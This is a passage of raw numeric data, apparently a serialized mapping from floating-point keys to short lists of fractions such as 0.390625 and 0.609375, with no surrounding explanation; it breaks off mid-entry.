[0.390625, 0.609375], 0.857177734375: [0.953125, 0.046875], 0.093505859375: [0.484375, 0.515625], 0.236083984375: [0.828125, 0.171875], 0.6630859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.546630859375: [0.984375, 0.015625], 0.4833984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.925537109375: [0.390625, 0.609375], 0.208740234375: [0.296875, 0.703125], 0.328125: [0.375, 0.625, 0.875, 0.125], 0.614990234375: [0.296875, 0.703125], 0.048583984375: [0.828125, 0.171875], 0.239990234375: [0.296875, 0.703125], 0.683349609375: [0.859375, 0.140625], 0.572021484375: [0.921875, 0.078125], 0.806396484375: [0.421875, 0.578125], 0.435302734375: [0.453125, 0.546875], 0.179443359375: [0.765625, 0.234375], 0.140625: [0.375, 0.625, 0.875, 0.125], 0.9365234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.820068359375: [0.734375, 0.265625], 0.78125: [0.5, 0.75, 0.0, 0.25], 0.314208984375: [0.328125, 0.671875], 0.46484375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.0537109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.097412109375: [0.890625, 0.109375], 0.6943359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.577880859375: [0.984375, 0.015625], 0.566162109375: [0.890625, 0.109375], 0.4990234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.956787109375: [0.390625, 0.609375], 0.382568359375: [0.734375, 0.265625], 0.34375: [0.5, 0.75, 0.0, 0.25], 0.646240234375: [0.703125, 0.296875], 0.626708984375: [0.328125, 0.671875], 0.247802734375: [0.453125, 0.546875], 0.714599609375: [0.859375, 0.140625], 0.261474609375: [0.359375, 0.640625], 0.02734375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.7568359375: [0.65625, 0.84375, 0.15625, 0.34375], 0.450927734375: [0.953125, 0.046875], 0.187255859375: [0.484375, 0.515625], 0.2568359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.0458984375: [0.21875, 0.28125, 0.71875, 0.78125], 0.9677734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.511474609375: [0.359375, 0.640625], 0.0927734375: [0.46875, 0.53125, 0.96875, 0.03125], 
0.329833984375: [0.828125, 0.171875], 0.126708984375: [0.328125, 0.671875], 0.919677734375: [0.953125, 0.046875], 0.101318359375: [0.265625, 0.734375], 0.161865234375: [0.796875, 0.203125], 0.7255859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.609130859375: [0.984375, 0.015625], 0.0625: [0.25, 0.5, 0.75, 0.0], 0.579833984375: [0.828125, 0.171875], 0.988037109375: [0.390625, 0.609375], 0.398193359375: [0.765625, 0.234375], 0.359375: [0.375, 0.625, 0.875, 0.125], 0.677490234375: [0.703125, 0.296875], 0.745849609375: [0.859375, 0.140625], 0.277099609375: [0.859375, 0.140625], 0.466552734375: [0.453125, 0.546875], 0.195068359375: [0.265625, 0.734375], 0.15625: [0.25, 0.5, 0.75, 0.0], 0.2724609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.822021484375: [0.921875, 0.078125], 0.9990234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.882568359375: [0.734375, 0.265625], 0.84375: [0.5, 0.75, 0.0, 0.25], 0.345458984375: [0.328125, 0.671875], 0.134521484375: [0.921875, 0.078125], 0.49609375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.950927734375: [0.953125, 0.046875], 0.105224609375: [0.359375, 0.640625], 0.363037109375: [0.390625, 0.609375], 0.640380859375: [0.984375, 0.015625], 0.413818359375: [0.734375, 0.265625], 0.375: [0.5, 0.75, 0.0, 0.25], 0.708740234375: [0.703125, 0.296875], 0.763427734375: [0.953125, 0.046875], 0.777099609375: [0.859375, 0.140625], 0.292724609375: [0.359375, 0.640625], 0.43359375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.482177734375: [0.953125, 0.046875], 0.202880859375: [0.984375, 0.015625], 0.790771484375: [0.921875, 0.078125], 0.534912109375: [0.890625, 0.109375], 0.663818359375: [0.734375, 0.265625], 0.513427734375: [0.953125, 0.046875], 0.1005859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.361083984375: [0.828125, 0.171875], 0.603271484375: [0.921875, 0.078125], 0.0615234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.109130859375: [0.984375, 0.015625], 0.7880859375: [0.34375, 0.65625, 0.84375, 
0.15625], 0.671630859375: [0.984375, 0.015625], 0.429443359375: [0.765625, 0.234375], 0.390625: [0.375, 0.625, 0.875, 0.125], 0.739990234375: [0.703125, 0.296875], 0.5458984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.808349609375: [0.859375, 0.140625], 0.845458984375: [0.671875, 0.328125], 0.077880859375: [0.984375, 0.015625], 0.861083984375: [0.828125, 0.171875], 0.497802734375: [0.453125, 0.546875], 0.210693359375: [0.234375, 0.765625], 0.3037109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.548583984375: [0.828125, 0.171875], 0.945068359375: [0.734375, 0.265625], 0.90625: [0.5, 0.75, 0.0, 0.25], 0.376708984375: [0.328125, 0.671875], 0.150146484375: [0.421875, 0.578125], 0.113037109375: [0.390625, 0.609375], 0.8193359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.5068359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.255615234375: [0.796875, 0.203125], 0.445068359375: [0.265625, 0.734375], 0.40625: [0.5, 0.75, 0.0, 0.25], 0.771240234375: [0.703125, 0.296875], 0.900146484375: [0.421875, 0.578125], 0.5771484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.839599609375: [0.859375, 0.140625], 0.323974609375: [0.359375, 0.640625], 0.913818359375: [0.734375, 0.265625], 0.875: [0.5, 0.75, 0.0, 0.25], 0.218505859375: [0.484375, 0.515625], 0.3193359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.597412109375: [0.890625, 0.109375], 0.55859375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.515380859375: [0.984375, 0.015625], 0.9375: [0.5, 0.75, 0.0, 0.25], 0.392333984375: [0.828125, 0.171875], 0.157958984375: [0.328125, 0.671875], 0.116943359375: [0.234375, 0.765625], 0.8505859375: [0.65625, 0.84375, 0.15625, 0.34375], 0.734130859375: [0.984375, 0.015625], 0.078125: [0.375, 0.625, 0.875, 0.125], 0.954833984375: [0.828125, 0.171875], 0.634521484375: [0.921875, 0.078125], 0.460693359375: [0.765625, 0.234375], 0.421875: [0.375, 0.625, 0.875, 0.125], 0.802490234375: [0.703125, 0.296875], 0.6083984375: [0.28125, 0.71875, 0.78125, 0.21875], 0.870849609375: [0.859375, 
0.140625], 0.339599609375: [0.859375, 0.140625], 0.982177734375: [0.953125, 0.046875], 0.560302734375: [0.453125, 0.546875], 0.09375: [0.25, 0.5, 0.75, 0.0], 0.226318359375: [0.265625, 0.734375], 0.1875: [0.25, 0.5, 0.75, 0.0], 0.021240234375: [0.296875, 0.703125], 0.628662109375: [0.890625, 0.109375], 0.58984375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.704833984375: [0.828125, 0.171875], 0.96875: [0.5, 0.75, 0.0, 0.25], 0.165771484375: [0.921875, 0.078125], 0.120849609375: [0.859375, 0.140625], 0.271240234375: [0.296875, 0.703125], 0.169677734375: [0.953125, 0.046875], 0.286865234375: [0.796875, 0.203125], 0.046630859375: [0.984375, 0.015625], 0.476318359375: [0.734375, 0.265625], 0.4375: [0.5, 0.75, 0.0, 0.25], 0.833740234375: [0.703125, 0.296875], 0.6396484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.6875: [0.5, 0.75, 0.0, 0.25], 0.902099609375: [0.859375, 0.140625], 0.355224609375: [0.359375, 0.640625], 0.591552734375: [0.453125, 0.546875], 0.234130859375: [0.984375, 0.015625], 0.3505859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.659912109375: [0.890625, 0.109375], 0.62109375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.517333984375: [0.828125, 0.171875], 0.1162109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.013427734375: [0.953125, 0.046875], 0.173583984375: [0.828125, 0.171875], 0.767333984375: [0.828125, 0.171875], 0.124755859375: [0.484375, 0.515625], 0.245849609375: [0.859375, 0.140625], 0.9130859375: [0.65625, 0.84375, 0.15625, 0.34375], 0.796630859375: [0.984375, 0.015625], 0.302490234375: [0.296875, 0.703125], 0.491943359375: [0.765625, 0.234375], 0.453125: [0.375, 0.625, 0.875, 0.125], 0.864990234375: [0.703125, 0.296875], 0.6708984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.554443359375: [0.765625, 0.234375], 0.933349609375: [0.859375, 0.140625], 0.370849609375: [0.859375, 0.140625], 0.622802734375: [0.453125, 0.546875], 0.064208984375: [0.328125, 0.671875], 0.005615234375: [0.796875, 0.203125], 
0.241943359375: [0.765625, 0.234375], 0.203125: [0.375, 0.625, 0.875, 0.125], 0.3662109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.691162109375: [0.890625, 0.109375], 0.65234375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.962646484375: [0.421875, 0.578125], 0.439208984375: [0.328125, 0.671875], 0.181396484375: [0.421875, 0.578125], 0.015625: [0.375, 0.625, 0.875, 0.125], 0.796875: [0.375, 0.625, 0.875, 0.125], 0.21484375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.9443359375: [0.65625, 0.84375, 0.15625, 0.34375], 0.827880859375: [0.984375, 0.015625], 0.08984375: [0.1875, 0.3125, 0.6875, 0.9375, 0.0625, 0.4375, 0.5625, 0.8125], 0.318115234375: [0.796875, 0.203125], 0.538818359375: [0.734375, 0.265625], 0.6552734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.986083984375: [0.828125, 0.171875], 0.46875: [0.5, 0.75, 0.0, 0.25], 0.896240234375: [0.703125, 0.296875], 0.7021484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.585693359375: [0.765625, 0.234375], 0.546875: [0.375, 0.625, 0.875, 0.125], 0.964599609375: [0.859375, 0.140625], 0.386474609375: [0.359375, 0.640625], 0.654052734375: [0.453125, 0.546875], 0.068115234375: [0.796875, 0.203125], 0.618896484375: [0.421875, 0.578125], 0.4052734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.019287109375: [0.390625, 0.609375], 0.249755859375: [0.484375, 0.515625], 0.3818359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.722412109375: [0.890625, 0.109375], 0.68359375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.265380859375: [0.984375, 0.015625], 0.519287109375: [0.390625, 0.609375], 0.454833984375: [0.828125, 0.171875], 0.189208984375: [0.328125, 0.671875], 0.9755859375: [0.65625, 0.84375, 0.15625, 0.34375], 0.859130859375: [0.984375, 0.015625], 0.333740234375: [0.296875, 0.703125], 0.128662109375: [0.890625, 0.109375], 0.689208984375: [0.671875, 0.328125], 0.484375: [0.375, 0.625, 0.875, 0.125], 0.927490234375: [0.703125, 0.296875], 0.056396484375: [0.421875, 
0.578125], 0.7333984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.616943359375: [0.765625, 0.234375], 0.578125: [0.375, 0.625, 0.875, 0.125], 0.995849609375: [0.859375, 0.140625], 0.402099609375: [0.859375, 0.140625], 0.685302734375: [0.453125, 0.546875], 0.072021484375: [0.921875, 0.078125], 0.1083984375: [0.21875, 0.28125, 0.71875, 0.78125], 0.21875: [0.25, 0.5, 0.75, 0.0], 0.3974609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.753662109375: [0.890625, 0.109375], 0.71484375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.281005859375: [0.484375, 0.515625], 0.470458984375: [0.328125, 0.671875], 0.197021484375: [0.921875, 0.078125], 0.931396484375: [0.421875, 0.578125], 0.304443359375: [0.765625, 0.234375], 0.890380859375: [0.984375, 0.015625], 0.349365234375: [0.796875, 0.203125], 0.702880859375: [0.984375, 0.015625], 0.136474609375: [0.359375, 0.640625], 0.958740234375: [0.703125, 0.296875], 0.7646484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.648193359375: [0.765625, 0.234375], 0.609375: [0.375, 0.625, 0.875, 0.125], 0.829833984375: [0.828125, 0.171875], 0.417724609375: [0.359375, 0.640625], 0.716552734375: [0.453125, 0.546875], 0.075927734375: [0.953125, 0.046875], 0.1318359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.265625: [0.375, 0.625, 0.875, 0.125], 0.2958984375: [0.28125, 0.71875, 0.78125, 0.21875], 0.4130859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.784912109375: [0.890625, 0.109375], 0.74609375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.2880859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.773193359375: [0.765625, 0.234375], 0.521240234375: [0.703125, 0.296875], 0.486083984375: [0.828125, 0.171875], 0.204833984375: [0.828125, 0.171875], 0.542724609375: [0.359375, 0.640625], 0.921630859375: [0.984375, 0.015625], 0.364990234375: [0.296875, 0.703125], 0.144287109375: [0.390625, 0.609375], 0.989990234375: [0.703125, 0.296875], 0.7958984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.679443359375: [0.765625, 
0.234375], 0.640625: [0.375, 0.625, 0.875, 0.125], 0.433349609375: [0.859375, 0.140625], 0.747802734375: [0.453125, 0.546875], 0.079833984375: [0.828125, 0.171875], 0.1396484375: [0.21875, 0.28125, 0.71875, 0.78125], 0.5537109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.234375: [0.375, 0.625, 0.875, 0.125], 0.027099609375: [0.859375, 0.140625], 0.296630859375: [0.984375, 0.015625], 0.77734375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.312255859375: [0.484375, 0.515625], 0.212646484375: [0.421875, 0.578125], 0.573974609375: [0.359375, 0.640625], 0.5146484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.380615234375: [0.796875, 0.203125], 0.152099609375: [0.859375, 0.140625], 0.472412109375: [0.890625, 0.109375], 0.710693359375: [0.765625, 0.234375], 0.671875: [0.375, 0.625, 0.875, 0.125], 0.259521484375: [0.921875, 0.078125], 0.6318359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.448974609375: [0.359375, 0.640625], 0.779052734375: [0.453125, 0.546875], 0.083740234375: [0.296875, 0.703125], 0.1474609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.5849609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.673583984375: [0.828125, 0.171875], 0.4443359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.847412109375: [0.890625, 0.109375], 0.80859375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.327880859375: [0.984375, 0.015625], 0.853271484375: [0.921875, 0.078125], 0.536865234375: [0.796875, 0.203125], 0.523193359375: [0.765625, 0.234375], 0.976318359375: [0.734375, 0.265625], 0.220458984375: [0.328125, 0.671875], 0.130615234375: [0.796875, 0.203125], 0.556396484375: [0.421875, 0.578125], 0.515625: [0.375, 0.625, 0.875, 0.125], 0.109375: [0.375, 0.625, 0.875, 0.125], 0.396240234375: [0.296875, 0.703125], 0.159912109375: [0.890625, 0.109375], 0.743896484375: [0.421875, 0.578125], 0.8583984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.741943359375: [0.765625, 0.234375], 0.703125: [0.375, 0.625, 0.875, 0.125], 0.275146484375: [0.421875, 
0.578125], 0.111083984375: [0.828125, 0.171875], 0.464599609375: [0.859375, 0.140625], 0.810302734375: [0.453125, 0.546875], 0.087646484375: [0.421875, 0.578125], 0.1552734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.6162109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.4599609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.878662109375: [0.890625, 0.109375], 0.83984375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.343505859375: [0.484375, 0.515625], 0.4912109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.228271484375: [0.921875, 0.078125], 0.636474609375: [0.359375, 0.640625], 0.0146484375: [0.21875, 0.28125, 0.71875, 0.78125], 0.306396484375: [0.421875, 0.578125], 0.411865234375: [0.796875, 0.203125], 0.167724609375: [0.359375, 0.640625], 0.638427734375: [0.953125, 0.046875], 0.8896484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.058349609375: [0.859375, 0.140625], 0.734375: [0.375, 0.625, 0.875, 0.125], 0.290771484375: [0.921875, 0.078125], 0.480224609375: [0.359375, 0.640625], 0.841552734375: [0.453125, 0.546875], 0.091552734375: [0.453125, 0.546875], 0.1630859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.6474609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.4755859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.909912109375: [0.890625, 0.109375], 0.87109375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.359130859375: [0.984375, 0.015625], 0.599365234375: [0.796875, 0.203125], 0.525146484375: [0.421875, 0.578125], 0.978271484375: [0.921875, 0.078125], 0.0224609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.667724609375: [0.359375, 0.640625], 0.060302734375: [0.453125, 0.546875], 0.177490234375: [0.296875, 0.703125], 0.427490234375: [0.296875, 0.703125], 0.175537109375: [0.390625, 0.609375], 0.9208984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.804443359375: [0.765625, 0.234375], 0.765625: [0.375, 0.625, 0.875, 0.125], 0.720458984375: [0.328125, 0.671875], 0.587646484375: [0.421875, 0.578125], 0.062255859375: [0.484375, 0.515625], 
0.495849609375: [0.859375, 0.140625], 0.872802734375: [0.453125, 0.546875], 0.1708984375: [0.28125, 0.71875, 0.78125, 0.21875], 0.6787109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.562255859375: [0.484375, 0.515625], 0.031005859375: [0.484375, 0.515625], 0.941162109375: [0.890625, 0.109375], 0.90234375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.374755859375: [0.484375, 0.515625], 0.630615234375: [0.796875, 0.203125], 0.243896484375: [0.421875, 0.578125], 0.698974609375: [0.359375, 0.640625], 0.761474609375: [0.359375, 0.640625], 0.253662109375: [0.890625, 0.109375], 0.657958984375: [0.328125, 0.671875], 0.12109375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.443115234375: [0.796875, 0.203125], 0.183349609375: [0.859375, 0.140625], 0.775146484375: [0.421875, 0.578125], 0.9521484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.835693359375: [0.765625, 0.234375], 0.298583984375: [0.828125, 0.171875], 0.322021484375: [0.921875, 0.078125], 0.788818359375: [0.734375, 0.265625], 0.601318359375: [0.734375, 0.265625], 0.75: [0.5, 0.75, 0.0, 0.25], 0.904052734375: [0.453125, 0.546875], 0.099365234375: [0.203125, 0.796875], 0.1787109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.7099609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.593505859375: [0.484375, 0.515625], 0.972412109375: [0.890625, 0.109375], 0.93359375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.390380859375: [0.984375, 0.015625], 0.661865234375: [0.796875, 0.203125], 0.816162109375: [0.890625, 0.109375], 0.527099609375: [0.859375, 0.140625], 0.730224609375: [0.359375, 0.640625], 0.269287109375: [0.390625, 0.609375], 0.458740234375: [0.296875, 0.703125], 0.191162109375: [0.890625, 0.109375], 0.15234375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.2646484375: [0.28125, 0.71875, 0.78125, 0.21875], 0.9599609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.798583984375: [0.828125, 0.171875], 0.9833984375: [0.71875, 0.78125, 
0.21875, 0.28125], 0.866943359375: [0.765625, 0.234375], 0.828125: [0.375, 0.625, 0.875, 0.125], 0.337646484375: [0.421875, 0.578125], 0.032958984375: [0.328125, 0.671875], 0.935302734375: [0.453125, 0.546875], 0.103271484375: [0.921875, 0.078125], 0.7412109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.624755859375: [0.484375, 0.515625], 0.96484375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.406005859375: [0.484375, 0.515625], 0.693115234375: [0.796875, 0.203125], 0.884521484375: [0.921875, 0.078125], 0.868896484375: [0.421875, 0.578125], 0.034912109375: [0.890625, 0.109375], 0.284912109375: [0.890625, 0.109375], 0.859375: [0.375, 0.625, 0.875, 0.125], 0.308349609375: [0.859375, 0.140625], 0.474365234375: [0.796875, 0.203125], 0.198974609375: [0.359375, 0.640625], 0.2802734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.898193359375: [0.765625, 0.234375], 0.366943359375: [0.765625, 0.234375], 0.353271484375: [0.921875, 0.078125], 0.138427734375: [0.953125, 0.046875], 0.05859375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.107177734375: [0.953125, 0.046875], 0.3349609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.7724609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.656005859375: [0.484375, 0.515625], 0.939208984375: [0.671875, 0.328125], 0.99609375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.724365234375: [0.796875, 0.203125], 0.952880859375: [0.984375, 0.015625], 0.642333984375: [0.828125, 0.171875], 0.529052734375: [0.453125, 0.546875], 0.1943359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.300537109375: [0.390625, 0.609375], 0.046875: [0.375, 0.625, 0.875, 0.125], 0.489990234375: [0.296875, 0.703125], 0.501708984375: [0.328125, 0.671875], 0.206787109375: [0.390625, 0.609375], 0.550537109375: [0.390625, 0.609375], 0.929443359375: [0.765625, 0.234375], 0.890625: [0.625, 0.875, 0.125, 0.375], 0.368896484375: [0.421875, 0.578125], 0.146240234375: [0.296875, 0.703125], 0.997802734375: [0.453125, 
0.546875], 0.095458984375: [0.328125, 0.671875], 0.2021484375: [0.28125, 0.71875, 0.78125, 0.21875], 0.8037109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.687255859375: [0.484375, 0.515625], 0.697021484375: [0.921875, 0.078125], 0.769287109375: [0.390625, 0.609375], 0.437255859375: [0.484375, 0.515625], 0.755615234375: [0.796875, 0.203125], 0.5615234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.8271484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.823974609375: [0.359375, 0.640625], 0.316162109375: [0.890625, 0.109375], 0.27734375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.712646484375: [0.421875, 0.578125], 0.1865234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.5224609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.984130859375: [0.984375, 0.015625], 0.214599609375: [0.859375, 0.140625], 0.3115234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.581787109375: [0.390625, 0.609375], 0.960693359375: [0.765625, 0.234375], 0.921875: [0.625, 0.875, 0.125, 0.375], 0.384521484375: [0.921875, 0.078125], 0.038818359375: [0.265625, 0.734375], 0.751708984375: [0.671875, 0.328125], 0.114990234375: [0.296875, 0.703125], 0.2099609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.8349609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.718505859375: [0.484375, 0.515625], 0.765380859375: [0.984375, 0.015625], 0.8818359375: [0.65625, 0.84375, 0.15625, 0.34375], 0.452880859375: [0.984375, 0.015625], 0.786865234375: [0.796875, 0.203125], 0.5927734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.531005859375: [0.484375, 0.515625], 0.855224609375: [0.640625, 0.359375], 0.331787109375: [0.390625, 0.609375], 0.792724609375: [0.359375, 0.640625], 0.544677734375: [0.953125, 0.046875], 0.726318359375: [0.734375, 0.265625], 0.222412109375: [0.890625, 0.109375], 0.18359375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.3271484375: [0.28125, 0.71875, 0.78125, 0.21875], 0.613037109375: [0.390625, 0.609375], 0.991943359375: [0.765625, 0.234375], 0.953125: [0.375, 0.625, 
0.875, 0.125], 0.040771484375: [0.921875, 0.078125], 0.118896484375: [0.421875, 0.578125], 0.2177734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.8662109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.749755859375: [0.484375, 0.515625], 0.279052734375: [0.453125, 0.546875], 0.468505859375: [0.484375, 0.515625], 0.818115234375: [0.796875, 0.203125], 0.6240234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.923583984375: [0.828125, 0.171875], 0.886474609375: [0.640625, 0.359375], 0.347412109375: [0.890625, 0.109375], 0.30859375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.575927734375: [0.953125, 0.046875], 0.263427734375: [0.953125, 0.046875], 0.876708984375: [0.671875, 0.328125], 0.230224609375: [0.359375, 0.640625], 0.3427734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.644287109375: [0.390625, 0.609375], 0.564208984375: [0.328125, 0.671875], 0.984375: [0.625, 0.875, 0.125, 0.375], 0.415771484375: [0.921875, 0.078125], 0.042724609375: [0.359375, 0.640625], 0.888427734375: [0.953125, 0.046875], 0.993896484375: [0.421875, 0.578125], 0.122802734375: [0.453125, 0.546875], 0.2255859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.8974609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.781005859375: [0.484375, 0.515625], 0.294677734375: [0.953125, 0.046875], 0.484130859375: [0.984375, 0.015625], 0.849365234375: [0.796875, 0.203125], 0.605224609375: [0.359375, 0.640625], 0.532958984375: [0.328125, 0.671875], 0.025146484375: [0.421875, 0.578125], 0.0302734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.917724609375: [0.640625, 0.359375], 0.036865234375: [0.796875, 0.203125], 0.607177734375: [0.953125, 0.046875], 0.140380859375: [0.984375, 0.015625], 0.003662109375: [0.890625, 0.109375], 0.238037109375: [0.390625, 0.609375], 0.3583984375: [0.28125, 0.71875, 0.78125, 0.21875], 0.675537109375: [0.390625, 0.609375], 0.431396484375: [0.421875, 0.578125], 0.044677734375: [0.953125, 0.046875], 0.2333984375: [0.28125, 0.71875, 0.78125, 0.21875], 0.9287109375: [0.40625, 
0.59375, 0.90625, 0.09375], 0.812255859375: [0.484375, 0.515625], 0.310302734375: [0.453125, 0.546875], 0.970458984375: [0.671875, 0.328125], 0.499755859375: [0.484375, 0.515625], 0.880615234375: [0.796875, 0.203125], 0.6865234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.570068359375: [0.734375, 0.265625], 0.948974609375: [0.359375, 0.640625], 0.378662109375: [0.890625, 0.109375], 0.33984375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.0380859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.066162109375: [0.890625, 0.109375], 0.171875: [0.375, 0.625, 0.875, 0.125], 0.011474609375: [0.359375, 0.640625], 0.3740234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.706787109375: [0.390625, 0.609375], 0.257568359375: [0.265625, 0.734375], 0.447021484375: [0.921875, 0.078125], 0.185302734375: [0.453125, 0.546875], 0.023193359375: [0.234375, 0.765625], 0.2412109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.4287109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.843505859375: [0.484375, 0.515625], 0.423583984375: [0.828125, 0.171875], 0.325927734375: [0.953125, 0.046875], 0.728271484375: [0.921875, 0.078125], 0.837646484375: [0.421875, 0.578125], 0.911865234375: [0.796875, 0.203125], 0.7177734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.503662109375: [0.890625, 0.109375], 0.5625: [0.5, 0.75, 0.0, 0.25], 0.947021484375: [0.921875, 0.078125], 0.980224609375: [0.640625, 0.359375], 0.394287109375: [0.390625, 0.609375], 0.669677734375: [0.953125, 0.046875], 0.070068359375: [0.265625, 0.734375], 0.52734375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.03125: [0.25, 0.5, 0.75, 0.0], 0.3896484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.738037109375: [0.390625, 0.609375], 0.273193359375: [0.765625, 0.234375], 0.907958984375: [0.671875, 0.328125], 0.462646484375: [0.421875, 0.578125], 0.193115234375: [0.796875, 0.203125], 0.782958984375: [0.671875, 0.328125], 0.2490234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.9912109375: [0.40625, 0.59375, 
